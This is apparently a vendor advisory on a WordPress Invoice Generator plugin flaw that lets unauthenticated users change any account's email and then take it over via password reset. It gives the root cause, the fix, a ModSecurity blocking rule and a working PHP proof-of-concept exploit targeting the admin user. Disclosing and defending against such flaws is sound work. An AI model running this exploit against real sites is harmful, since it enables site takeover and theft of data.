Atomic Edge analysis of CVE-2026-12415 (metadata-based): This vulnerability affects the Invoice Generator plugin for WordPress (slug: invoice-creator) up to version 1.0.0. It allows unauthenticated privilege escalation to administrator level via account takeover. The CVSS score is 9.8 (Critical).
The root cause is a missing capability check on the AJAX action pravel_invoice_edit_account. The handler is registered for both authenticated and unauthenticated users via wp_ajax_nopriv_ and wp_ajax_ hooks. Atomic Edge analysis infers from the CWE (Improper Privilege Management) and description that the function lacks nonce verification, authentication checks, and ownership validation. The function accepts user_id and user_email from POST data and passes them directly to wp_update_user(). No capability check like current_user_can() is present. This is confirmed by the explicit mention of missing checks in the vulnerability description.
An attacker can exploit this by sending a POST request to /wp-admin/admin-ajax.php with action=pravel_invoice_edit_account, user_id set to the target user’s ID (e.g., 1 for admin), and user_email set to an attacker-controlled email address. The plugin updates the user’s email in the database without any verification. The attacker then uses WordPress’s built-in password reset flow to request a password reset email, which goes to the attacker’s email. The attacker clicks the reset link and sets a new password, gaining full access to the targeted account.
The fix requires adding capability checks and nonce verification. The developer should verify that the user making the request is authenticated (is_user_logged_in()), has proper capabilities (like edit_users), and owns the account being modified. A nonce should be created and validated to prevent CSRF attacks. The user_id parameter must be validated against the current user’s ID to prevent editing other accounts. Atomic Edge recommends checking that the modified user ID belongs to the current user unless an admin capability is present.
The impact is critical. An unauthenticated attacker can take over any WordPress user account, including administrators. This leads to complete site compromise. The attacker gains full control of the WordPress installation, including the ability to install plugins, modify themes, create new admin users, and potentially execute arbitrary code on the server. All data on the site is exposed and modifiable.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-12415 (metadata-based)
# Blocks unauthenticated email change via pravel_invoice_edit_account AJAX action
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php"
"id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-12415: Invoice Generator account takeover attempt',severity:'CRITICAL',tag:'CVE-2026-12415'"
SecRule ARGS_POST:action "@streq pravel_invoice_edit_account" "chain"
SecRule ARGS_POST:user_id "@rx ^d+$" "chain"
SecRule ARGS_POST:user_email "@rx .+@.+" "t:none"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-12415 - Invoice Generator <= 1.0.0 - Unauthenticated Privilege Escalation via Account Takeover
// Configuration
$target_url = 'http://example.com'; // Change this to the target WordPress site URL
$target_user_id = 1; // Default admin user ID is 1; adjust if needed
$attacker_email = 'attacker@example.com'; // Attacker-controlled email to receive password reset
// Step 1: Change the target user's email to attacker-controlled email via AJAX
$ajax_url = rtrim($target_url, '/') . '/wp-admin/admin-ajax.php';
$post_data = array(
'action' => 'pravel_invoice_edit_account',
'user_id' => $target_user_id,
'user_email' => $attacker_email
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($http_code === 200) {
echo "[+] Successfully changed email for user ID $target_user_id to $attacker_emailn";
echo "[+] Now use WordPress password reset at: " . rtrim($target_url, '/') . "/wp-login.php?action=lostpasswordn";
echo "[+] Enter username or the new email ($attacker_email) to receive reset link.n";
} else {
echo "[-] Failed to change email. HTTP status: $http_coden";
echo "[-] Response: $responsen";
}
?>
